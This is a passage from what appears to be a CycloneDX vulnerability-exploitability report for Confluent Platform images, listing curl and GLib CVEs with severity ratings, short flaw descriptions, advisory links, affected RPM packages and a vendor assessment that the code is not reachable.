              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58010",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        126
      ],
      "description": "A flaw was found in GLib. An off-by-one error can occur in the gvs_tuple_is_normal function in the glib/gvariant-serialiser.c file when doing an alignment padding check because the bounds check uses > instead of >=, causing an out-of-bounds read of only 1 byte. This issue can cause a minor information disclosure of 1 byte and a denial of service when the out-of-bounds read crosses a page boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58010"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58010"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-m7rp-473c-296x"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3915"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58010.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58010"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58010"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-17T10:16:41+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58011",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "A flaw was found in GLib. An out-of-bounds read of only 2 bytes can occur in the g_date_time_get_ymd function in the glib/gdatetime.c file when an invalid GDateTime object produced by the g_date_time_add_full function is processed. This flaw can corrupt the date output and potentially cause logic errors that may lead to a denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58011"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58011"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-8xmh-8wfg-9f6j"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3917"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/work_items/3917"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58011.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58011"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58011"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-17T10:16:41+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58012",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        126
      ],
      "description": "A flaw was found in GLib. A buffer over-read can occur in the g_regex_replace function when used with the `G_REGEX_RAW` compile flag and case-change replacement escapes because the string_append function processes matched substrings using UTF-8 functions that assume valid UTF-8 input, even when the string is treated as raw bytes. This vulnerability can cause a minor information disclosure of 1-5 bytes and a denial of service when the buffer over-read crosses a page boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58012"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58012"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-vwg8-37h9-g38g"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3918"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58012.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58012"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58012"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-17T10:16:41+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
